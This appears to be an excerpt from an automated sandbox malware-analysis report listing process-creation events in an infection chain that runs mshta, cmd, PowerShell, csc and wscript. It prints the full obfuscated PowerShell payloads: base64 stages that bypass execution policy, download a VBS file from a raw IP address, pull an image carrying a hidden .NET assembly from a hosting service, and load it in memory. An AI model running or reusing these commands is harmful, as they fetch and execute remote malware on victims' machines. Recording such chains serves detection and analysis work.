        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POwErsHELL -EX ByPass -NoP -w 1 -c DeviCECREDenTIalDePlOyMENT.eXE ; INvOke-ExPressiON($(INvOKE-expReSsIon('[SYSTeM.teXt.EncodInG]'+[ChaR]58+[ChaR]0X3a+'UTF8.GEtStRInG([SYstEm.cONVErT]'+[cHaR]0x3a+[chaR]58+'fROMBAse64StrINg('+[chAr]34+'JHhEICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYWRELXRZcGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1lTUJFcmRFZkluaXRpb24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVybG1vbi5kbGwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIERRSixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgUURsTWx0WmRDSixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRG1oSUdKc014ZkMsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBsLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDdmtnaEopOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BTWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIlNyZ3BDamUiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYU1Fc1BBQ0UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgZUcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkeEQ6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8yMy45NS4yMzUuMjkvOTAvdmVyeW5pY2ViZWF1dGlmdWxwaWN0dWVmb3JlbnRpcmVsaWZla2lkc2dpdmVubWViYWNrd2l0aG5ldy50SUYiLCIkRW52OkFQUERBVEFcdmVyeW5pY2ViZWF1dGlmdWxwaWN0dWVmb3JlbnRpcmVsaWZla2lkc2dpdmVubWUudmJTIiwwLDApO3N0YVJ0LXNMRWVwKDMpO0lOdk9rRS1FeFByZVNTaW9uICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRW5WOkFQUERBVEFcdmVyeW5pY2ViZWF1dGlmdWxwaWN0dWVmb3JlbnRpcmVsaWZla2lkc2dpdmVubWUudmJTIg=='+[CHaR]34+'))')))"Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\vlwyfswc\vlwyfswc.cmdline"Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\verynicebeautifulpictueforentirelifekidsgivenme.vbS" Jump to behavior
        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES9ECF.tmp" "c:\Users\user\AppData\Local\Temp\vlwyfswc\CSCD4E4666864B4048A31961A99612757D.TMP"Jump to behavior
        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $verilus = 'JGFwb3N0b2xpY25lc3MgPSAnaHR0cHM6Ly9yZXMuY2xvdWRpbmFyeS5jb20vZHl0Zmx0NjFuL2ltYWdlL3VwbG9hZC92MTczMzEzNDk0Ny9ia2xweXNleWV1dDRpbXB3NTBuMS5qcGcgJzskdmlicm9tZXRlcnMgPSBOZXctT2JqZWN0IFN5c3RlbS5OZXQuV2ViQ2xpZW50OyRzYW5nYXBlbnVtID0gJHZpYnJvbWV0ZXJzLkRvd25sb2FkRGF0YSgkYXBvc3RvbGljbmVzcyk7JGhvcmlzbWFzY29wZSA9IFtTeXN0ZW0uVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKCRzYW5nYXBlbnVtKTskSmFuaW5lID0gJzw8QkFTRTY0X1NUQVJUPj4nOyR0cmlicm9tc2Fsb2wgPSAnPDxCQVNFNjRfRU5EPj4nOyRBcmFicyA9ICRob3Jpc21hc2NvcGUuSW5kZXhPZigkSmFuaW5lKTskcGx1cmlzcGlyYWwgPSAkaG9yaXNtYXNjb3BlLkluZGV4T2YoJHRyaWJyb21zYWxvbCk7JEFyYWJzIC1nZSAwIC1hbmQgJHBsdXJpc3BpcmFsIC1ndCAkQXJhYnM7JEFyYWJzICs9ICRKYW5pbmUuTGVuZ3RoOyRkZWNlcm5tZW50ID0gJHBsdXJpc3BpcmFsIC0gJEFyYWJzOyRhZmlyZSA9ICRob3Jpc21hc2NvcGUuU3Vic3RyaW5nKCRBcmFicywgJGRlY2Vybm1lbnQpOyR1bmRyZXNzZWQgPSAtam9pbiAoJGFmaXJlLlRvQ2hhckFycmF5KCkgfCBGb3JFYWNoLU9iamVjdCB7ICRfIH0pWy0xLi4tKCRhZmlyZS5MZW5ndGgpXTskR2FzdG9uID0gW1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygkdW5kcmVzc2VkKTskY3V0aXRlcmVicmEgPSBbU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHldOjpMb2FkKCRHYXN0b24pOyRhbGxhbnRvaWRlYSA9IFtkbmxpYi5JTy5Ib21lXS5HZXRNZXRob2QoJ1ZBSScpOyRhbGxhbnRvaWRlYS5JbnZva2UoJG51bGwsIEAoJzAvdnlpZEIvci9lZS5ldHNhcC8vOnNwdHRoJywgJyRiaW9ncmFwaGVlcycsICckYmlvZ3JhcGhlZXMnLCAnJGJpb2dyYXBoZWVzJywgJ0Nhc1BvbCcsICckYmlvZ3JhcGhlZXMnLCAnJGJpb2dyYXBoZWVzJywnJGJpb2dyYXBoZWVzJywnJGJpb2dyYXBoZWVzJywnJGJpb2dyYXBoZWVzJywnJGJpb2dyYXBoZWVzJywnJGJpb2dyYXBoZWVzJywnMScsJyRiaW9ncmFwaGVlcycpKTs=';$spinispicule = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($verilus));Invoke-Expression $spinispiculeJump to behavior
        Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" "/C POwErsHELL -EX ByPass -NoP -w 1 -c DeviCECREDenTIalDePlOyMENT.eXE ; INvOke-ExPressiON($(INvOKE-expReSsIon('[SYSTeM.teXt.EncodInG]'+[ChaR]58+[ChaR]0X3a+'UTF8.GEtStRInG([SYstEm.cONVErT]'+[cHaR]0x3a+[chaR]58+'fROMBAse64StrINg('+[chAr]34+'JHhEICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYWRELXRZcGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1lTUJFcmRFZkluaXRpb24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVybG1vbi5kbGwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIERRSixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgUURsTWx0WmRDSixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRG1oSUdKc014ZkMsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBsLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDdmtnaEopOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BTWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIlNyZ3BDamUiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYU1Fc1BBQ0UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgZUcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkeEQ6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8yMy45NS4yMzUuMjkvOTAvdmVyeW5pY2ViZWF1dGlmdWxwaWN0dWVmb3JlbnRpcmVsaWZla2lkc2dpdmVubWViYWNrd2l0aG5ldy50SUYiLCIkRW52OkFQUERBVEFcdmVyeW5pY2ViZWF1dGlmdWxwaWN0dWVmb3JlbnRpcmVsaWZla2lkc2dpdmVubWUudmJTIiwwLDApO3N0YVJ0LXNMRWVwKDMpO0lOdk9rRS1FeFByZVNTaW9uICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRW5WOkFQUERBVEFcdmVyeW5pY2ViZWF1dGlmdWxwaWN0dWVmb3JlbnRpcmVsaWZla2lkc2dpdmVubWUudmJTIg=='+[CHaR]34+'))')))"Jump to behavior
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POwErsHELL -EX ByPass -NoP -w 1 -c DeviCECREDenTIalDePlOyMENT.eXE ; INvOke-ExPressiON($(INvOKE-expReSsIon('[SYSTeM.teXt.EncodInG]'+[ChaR]58+[ChaR]0X3a+'UTF8.GEtStRInG([SYstEm.cONVErT]'+[cHaR]0x3a+[chaR]58+'fROMBAse64StrINg('+[chAr]34+'JHhEICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYWRELXRZcGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1lTUJFcmRFZkluaXRpb24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVybG1vbi5kbGwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIERRSixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgUURsTWx0WmRDSixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRG1oSUdKc014ZkMsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBsLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDdmtnaEopOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BTWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIlNyZ3BDamUiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYU1Fc1BBQ0UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgZUcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkeEQ6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8yMy45NS4yMzUuMjkvOTAvdmVyeW5pY2ViZWF1dGlmdWxwaWN0dWVmb3JlbnRpcmVsaWZla2lkc2dpdmVubWViYWNrd2l0aG5ldy50SUYiLCIkRW52OkFQUERBVEFcdmVyeW5pY2ViZWF1dGlmdWxwaWN0dWVmb3JlbnRpcmVsaWZla2lkc2dpdmVubWUudmJTIiwwLDApO3N0YVJ0LXNMRWVwKDMpO0lOdk9rRS1FeFByZVNTaW9uICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRW5WOkFQUERBVEFcdmVyeW5pY2ViZWF1dGlmdWxwaWN0dWVmb3JlbnRpcmVsaWZla2lkc2dpdmVubWUudmJTIg=='+[CHaR]34+'))')))"
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\5djzgayy\5djzgayy.cmdline"
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\verynicebeautifulpictueforentirelifekidsgivenme.vbS"
        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESEC91.tmp" "c:\Users\user\AppData\Local\Temp\5djzgayy\CSC760185DBFBB46BF8363AB3E3456F7D3.TMP"Jump to behavior
        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $verilus = 'JGFwb3N0b2xpY25lc3MgPSAnaHR0cHM6Ly9yZXMuY2xvdWRpbmFyeS5jb20vZHl0Zmx0NjFuL2ltYWdlL3VwbG9hZC92MTczMzEzNDk0Ny9ia2xweXNleWV1dDRpbXB3NTBuMS5qcGcgJzskdmlicm9tZXRlcnMgPSBOZXctT2JqZWN0IFN5c3RlbS5OZXQuV2ViQ2xpZW50OyRzYW5nYXBlbnVtID0gJHZpYnJvbWV0ZXJzLkRvd25sb2FkRGF0YSgkYXBvc3RvbGljbmVzcyk7JGhvcmlzbWFzY29wZSA9IFtTeXN0ZW0uVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKCRzYW5nYXBlbnVtKTskSmFuaW5lID0gJzw8QkFTRTY0X1NUQVJUPj4nOyR0cmlicm9tc2Fsb2wgPSAnPDxCQVNFNjRfRU5EPj4nOyRBcmFicyA9ICRob3Jpc21hc2NvcGUuSW5kZXhPZigkSmFuaW5lKTskcGx1cmlzcGlyYWwgPSAkaG9yaXNtYXNjb3BlLkluZGV4T2YoJHRyaWJyb21zYWxvbCk7JEFyYWJzIC1nZSAwIC1hbmQgJHBsdXJpc3BpcmFsIC1ndCAkQXJhYnM7JEFyYWJzICs9ICRKYW5pbmUuTGVuZ3RoOyRkZWNlcm5tZW50ID0gJHBsdXJpc3BpcmFsIC0gJEFyYWJzOyRhZmlyZSA9ICRob3Jpc21hc2NvcGUuU3Vic3RyaW5nKCRBcmFicywgJGRlY2Vybm1lbnQpOyR1bmRyZXNzZWQgPSAtam9pbiAoJGFmaXJlLlRvQ2hhckFycmF5KCkgfCBGb3JFYWNoLU9iamVjdCB7ICRfIH0pWy0xLi4tKCRhZmlyZS5MZW5ndGgpXTskR2FzdG9uID0gW1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygkdW5kcmVzc2VkKTskY3V0aXRlcmVicmEgPSBbU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHldOjpMb2FkKCRHYXN0b24pOyRhbGxhbnRvaWRlYSA9IFtkbmxpYi5JTy5Ib21lXS5HZXRNZXRob2QoJ1ZBSScpOyRhbGxhbnRvaWRlYS5JbnZva2UoJG51bGwsIEAoJzAvdnlpZEIvci9lZS5ldHNhcC8vOnNwdHRoJywgJyRiaW9ncmFwaGVlcycsICckYmlvZ3JhcGhlZXMnLCAnJGJpb2dyYXBoZWVzJywgJ0Nhc1BvbCcsICckYmlvZ3JhcGhlZXMnLCAnJGJpb2dyYXBoZWVzJywnJGJpb2dyYXBoZWVzJywnJGJpb2dyYXBoZWVzJywnJGJpb2dyYXBoZWVzJywnJGJpb2dyYXBoZWVzJywnJGJpb2dyYXBoZWVzJywnMScsJyRiaW9ncmFwaGVlcycpKTs=';$spinispicule = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($verilus));Invoke-Expression $spinispicule
        Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\cmd.exe "c:\windows\system32\cmd.exe" "/c powershell -ex bypass -nop -w 1 -c devicecredentialdeployment.exe ; invoke-expression($(invoke-expression('[system.text.encoding]'+[char]58+[char]0x3a+'utf8.getstring([system.convert]'+[char]0x3a+[char]58+'frombase64string('+[char]34+'jhheicagicagicagicagicagicagicagicagicagicagicagid0gicagicagicagicagicagicagicagicagicagicagicagywrelxrzcgugicagicagicagicagicagicagicagicagicagicagicaglw1ltujfcmrfzkluaxrpb24gicagicagicagicagicagicagicagicagicagicagicagj1tebgxjbxbvcnqoinvybg1vbi5kbgwilcagicagicagicagicagicagicagicagicagicagicagicbdagfyu2v0id0gq2hhclnldc5vbmljb2rlkv1wdwjsawmgc3rhdgljigv4dgvybibjbnrqdhigvvjmrg93bmxvywrub0zpbguosw50uhryicagicagicagicagicagicagicagicagicagicagicagierrsixzdhjpbmcgicagicagicagicagicagicagicagicagicagicagicaguurstwx0wmrdsixzdhjpbmcgicagicagicagicagicagicagicagicagicagicagicagrg1osudkc014zkmsdwludcagicagicagicagicagicagicagicagicagicagicagicbsleludfb0ciagicagicagicagicagicagicagicagicagicagicagicbddmtnaeopoycgicagicagicagicagicagicagicagicagicagicagicaglu5btwugicagicagicagicagicagicagicagicagicagicagicagilnyz3bdamuiicagicagicagicagicagicagicagicagicagicagicagic1oyu1fc1bbq0ugicagicagicagicagicagicagicagicagicagicagicagzucgicagicagicagicagicagicagicagicagicagicagicaglvbhc3nuahj1oyagicagicagicagicagicagicagicagicagicagicagicakeeq6olvstervd25sb2fkvg9gawxlkdasimh0dha6ly8ymy45ns4ymzuumjkvotavdmvyew5py2vizwf1dglmdwxwawn0dwvmb3jlbnrpcmvsawzla2lkc2dpdmvubwviywnrd2l0ag5ldy50suyilcikrw52okfquerbvefcdmvyew5py2vizwf1dglmdwxwawn0dwvmb3jlbnrpcmvsawzla2lkc2dpdmvubwuudmjtiiwwldapo3n0yvj0lxnmrwvwkdmpo0lodk9rrs1fefbyzvntaw9uicagicagicagicagicagicagicagicagicagicagicagicikrw5wokfquerbvefcdmvyew5py2vizwf1dglmdwxwawn0dwvmb3jlbnrpcmvsawzla2lkc2dpdmvubwuudmjtig=='+[char]34+'))')))"
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -ex bypass -nop -w 1 -c devicecredentialdeployment.exe ; invoke-expression($(invoke-expression('[system.text.encoding]'+[char]58+[char]0x3a+'utf8.getstring([system.convert]'+[char]0x3a+[char]58+'frombase64string('+[char]34+'jhheicagicagicagicagicagicagicagicagicagicagicagid0gicagicagicagicagicagicagicagicagicagicagicagywrelxrzcgugicagicagicagicagicagicagicagicagicagicagicaglw1ltujfcmrfzkluaxrpb24gicagicagicagicagicagicagicagicagicagicagicagj1tebgxjbxbvcnqoinvybg1vbi5kbgwilcagicagicagicagicagicagicagicagicagicagicagicbdagfyu2v0id0gq2hhclnldc5vbmljb2rlkv1wdwjsawmgc3rhdgljigv4dgvybibjbnrqdhigvvjmrg93bmxvywrub0zpbguosw50uhryicagicagicagicagicagicagicagicagicagicagicagierrsixzdhjpbmcgicagicagicagicagicagicagicagicagicagicagicaguurstwx0wmrdsixzdhjpbmcgicagicagicagicagicagicagicagicagicagicagicagrg1osudkc014zkmsdwludcagicagicagicagicagicagicagicagicagicagicagicbsleludfb0ciagicagicagicagicagicagicagicagicagicagicagicbddmtnaeopoycgicagicagicagicagicagicagicagicagicagicagicaglu5btwugicagicagicagicagicagicagicagicagicagicagicagilnyz3bdamuiicagicagicagicagicagicagicagicagicagicagicagic1oyu1fc1bbq0ugicagicagicagicagicagicagicagicagicagicagicagzucgicagicagicagicagicagicagicagicagicagicagicaglvbhc3nuahj1oyagicagicagicagicagicagicagicagicagicagicagicakeeq6olvstervd25sb2fkvg9gawxlkdasimh0dha6ly8ymy45ns4ymzuumjkvotavdmvyew5py2vizwf1dglmdwxwawn0dwvmb3jlbnrpcmvsawzla2lkc2dpdmvubwviywnrd2l0ag5ldy50suyilcikrw52okfquerbvefcdmvyew5py2vizwf1dglmdwxwawn0dwvmb3jlbnrpcmvsawzla2lkc2dpdmvubwuudmjtiiwwldapo3n0yvj0lxnmrwvwkdmpo0lodk9rrs1fefbyzvntaw9uicagicagicagicagicagicagicagicagicagicagicagicikrw5wokfquerbvefcdmvyew5py2vizwf1dglmdwxwawn0dwvmb3jlbnrpcmvsawzla2lkc2dpdmvubwuudmjtig=='+[char]34+'))')))"
        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" $verilus = 'jgfwb3n0b2xpy25lc3mgpsanahr0chm6ly9yzxmuy2xvdwrpbmfyes5jb20vzhl0zmx0njful2ltywdll3vwbg9hzc92mtczmzezndk0ny9ia2xwexnlewv1ddrpbxb3ntbums5qcgcgjzskdmlicm9tzxrlcnmgpsbozxctt2jqzwn0ifn5c3rlbs5ozxquv2viq2xpzw50oyrzyw5nyxblbnvtid0gjhzpynjvbwv0zxjzlkrvd25sb2fkrgf0ysgkyxbvc3rvbgljbmvzcyk7jghvcmlzbwfzy29wzsa9ifttexn0zw0uvgv4dc5fbmnvzgluz106olvurjgur2v0u3ryaw5nkcrzyw5nyxblbnvtktsksmfuaw5lid0gjzw8qkftrty0x1nuqvjupj4noyr0cmlicm9tc2fsb2wgpsanpdxcqvnfnjrfru5epj4noyrbcmficya9icrob3jpc21hc2nvcguusw5kzxhpzigksmfuaw5lktskcgx1cmlzcglyywwgpsakag9yaxntyxnjb3bllkluzgv4t2yojhryawjyb21zywxvbck7jefyywjzic1nzsawic1hbmqgjhbsdxjpc3bpcmfsic1ndcakqxjhynm7jefyywjzics9icrkyw5pbmuutgvuz3rooyrkzwnlcm5tzw50id0gjhbsdxjpc3bpcmfsic0gjefyywjzoyrhzmlyzsa9icrob3jpc21hc2nvcguuu3vic3ryaw5nkcrbcmficywgjgrly2vybm1lbnqpoyr1bmryzxnzzwqgpsatam9pbiaojgfmaxjlllrvq2hhckfycmf5kckgfcbgb3jfywnolu9iamvjdcb7icrfih0pwy0xli4tkcrhzmlyzs5mzw5ndggpxtskr2fzdg9uid0gw1n5c3rlbs5db252zxj0xto6rnjvbujhc2u2nfn0cmluzygkdw5kcmvzc2vkktsky3v0axrlcmvicmegpsbbu3lzdgvtlljlzmxly3rpb24uqxnzzw1ibhldojpmb2fkkcrhyxn0b24poyrhbgxhbnrvawrlysa9iftkbmxpyi5jty5ib21lxs5hzxrnzxrob2qoj1zbsscpoyrhbgxhbnrvawrlys5jbnzva2uojg51bgwsieaojzavdnlpzeivci9lzs5ldhnhcc8vonnwdhrojywgjyriaw9ncmfwagvlcycsicckymlvz3jhcghlzxmnlcanjgjpb2dyyxbozwvzjywgj0nhc1bvbccsicckymlvz3jhcghlzxmnlcanjgjpb2dyyxbozwvzjywnjgjpb2dyyxbozwvzjywnjgjpb2dyyxbozwvzjywnjgjpb2dyyxbozwvzjywnjgjpb2dyyxbozwvzjywnjgjpb2dyyxbozwvzjywnmscsjyriaw9ncmfwagvlcycpkts=';$spinispicule = [system.text.encoding]::utf8.getstring([system.convert]::frombase64string($verilus));invoke-expression $spinispicule
        Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\cmd.exe "c:\windows\system32\cmd.exe" "/c powershell -ex bypass -nop -w 1 -c devicecredentialdeployment.exe ; invoke-expression($(invoke-expression('[system.text.encoding]'+[char]58+[char]0x3a+'utf8.getstring([system.convert]'+[char]0x3a+[char]58+'frombase64string('+[char]34+'jhheicagicagicagicagicagicagicagicagicagicagicagid0gicagicagicagicagicagicagicagicagicagicagicagywrelxrzcgugicagicagicagicagicagicagicagicagicagicagicaglw1ltujfcmrfzkluaxrpb24gicagicagicagicagicagicagicagicagicagicagicagj1tebgxjbxbvcnqoinvybg1vbi5kbgwilcagicagicagicagicagicagicagicagicagicagicagicbdagfyu2v0id0gq2hhclnldc5vbmljb2rlkv1wdwjsawmgc3rhdgljigv4dgvybibjbnrqdhigvvjmrg93bmxvywrub0zpbguosw50uhryicagicagicagicagicagicagicagicagicagicagicagierrsixzdhjpbmcgicagicagicagicagicagicagicagicagicagicagicaguurstwx0wmrdsixzdhjpbmcgicagicagicagicagicagicagicagicagicagicagicagrg1osudkc014zkmsdwludcagicagicagicagicagicagicagicagicagicagicagicbsleludfb0ciagicagicagicagicagicagicagicagicagicagicagicbddmtnaeopoycgicagicagicagicagicagicagicagicagicagicagicaglu5btwugicagicagicagicagicagicagicagicagicagicagicagilnyz3bdamuiicagicagicagicagicagicagicagicagicagicagicagic1oyu1fc1bbq0ugicagicagicagicagicagicagicagicagicagicagicagzucgicagicagicagicagicagicagicagicagicagicagicaglvbhc3nuahj1oyagicagicagicagicagicagicagicagicagicagicagicakeeq6olvstervd25sb2fkvg9gawxlkdasimh0dha6ly8ymy45ns4ymzuumjkvotavdmvyew5py2vizwf1dglmdwxwawn0dwvmb3jlbnrpcmvsawzla2lkc2dpdmvubwviywnrd2l0ag5ldy50suyilcikrw52okfquerbvefcdmvyew5py2vizwf1dglmdwxwawn0dwvmb3jlbnrpcmvsawzla2lkc2dpdmvubwuudmjtiiwwldapo3n0yvj0lxnmrwvwkdmpo0lodk9rrs1fefbyzvntaw9uicagicagicagicagicagicagicagicagicagicagicagicikrw5wokfquerbvefcdmvyew5py2vizwf1dglmdwxwawn0dwvmb3jlbnrpcmvsawzla2lkc2dpdmvubwuudmjtig=='+[char]34+'))')))"
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -ex bypass -nop -w 1 -c devicecredentialdeployment.exe ; invoke-expression($(invoke-expression('[system.text.encoding]'+[char]58+[char]0x3a+'utf8.getstring([system.convert]'+[char]0x3a+[char]58+'frombase64string('+[char]34+'jhheicagicagicagicagicagicagicagicagicagicagicagid0gicagicagicagicagicagicagicagicagicagicagicagywrelxrzcgugicagicagicagicagicagicagicagicagicagicagicaglw1ltujfcmrfzkluaxrpb24gicagicagicagicagicagicagicagicagicagicagicagj1tebgxjbxbvcnqoinvybg1vbi5kbgwilcagicagicagicagicagicagicagicagicagicagicagicbdagfyu2v0id0gq2hhclnldc5vbmljb2rlkv1wdwjsawmgc3rhdgljigv4dgvybibjbnrqdhigvvjmrg93bmxvywrub0zpbguosw50uhryicagicagicagicagicagicagicagicagicagicagicagierrsixzdhjpbmcgicagicagicagicagicagicagicagicagicagicagicaguurstwx0wmrdsixzdhjpbmcgicagicagicagicagicagicagicagicagicagicagicagrg1osudkc014zkmsdwludcagicagicagicagicagicagicagicagicagicagicagicbsleludfb0ciagicagicagicagicagicagicagicagicagicagicagicbddmtnaeopoycgicagicagicagicagicagicagicagicagicagicagicaglu5btwugicagicagicagicagicagicagicagicagicagicagicagilnyz3bdamuiicagicagicagicagicagicagicagicagicagicagicagic1oyu1fc1bbq0ugicagicagicagicagicagicagicagicagicagicagicagzucgicagicagicagicagicagicagicagicagicagicagicaglvbhc3nuahj1oyagicagicagicagicagicagicagicagicagicagicagicakeeq6olvstervd25sb2fkvg9gawxlkdasimh0dha6ly8ymy45ns4ymzuumjkvotavdmvyew5py2vizwf1dglmdwxwawn0dwvmb3jlbnrpcmvsawzla2lkc2dpdmvubwviywnrd2l0ag5ldy50suyilcikrw52okfquerbvefcdmvyew5py2vizwf1dglmdwxwawn0dwvmb3jlbnrpcmvsawzla2lkc2dpdmvubwuudmjtiiwwldapo3n0yvj0lxnmrwvwkdmpo0lodk9rrs1fefbyzvntaw9uicagicagicagicagicagicagicagicagicagicagicagicikrw5wokfquerbvefcdmvyew5py2vizwf1dglmdwxwawn0dwvmb3jlbnrpcmvsawzla2lkc2dpdmvubwuudmjtig=='+[char]34+'))')))"
